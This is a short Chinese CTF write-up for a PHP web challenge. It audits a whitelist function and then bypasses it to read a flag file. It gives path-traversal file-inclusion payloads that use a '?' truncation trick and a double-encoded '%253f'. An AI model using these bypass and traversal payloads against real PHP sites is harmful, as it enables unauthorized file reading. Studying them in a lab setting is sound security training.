打开界面出现一张图片——>F12查看源码:提示进入source.php
进入界面:
根据代码内容,查看hint,提示flag在ffffllllaaaagggg中
代码审计:
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
根据四个If条件中:
1.发现能从source.php与hint.php进行访问
2.$_page截取到page从0到问?的字符串
3.用url解码$page
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
REQUEST利用…/…/跳转目录读取flag,可以一次一次…/尝试,我发现ffffllllaaaagggg都为四个,所以可能四次跳转,直接尝试
进行payload:
http://******/source.php?file=hint.php?/../../../../ffffllllaaaagggg
或:
http://******/source.php?file=source.php%253f../../../../../ffffllllaaaagggg
(?的两次编码值为’%253f)
flag出现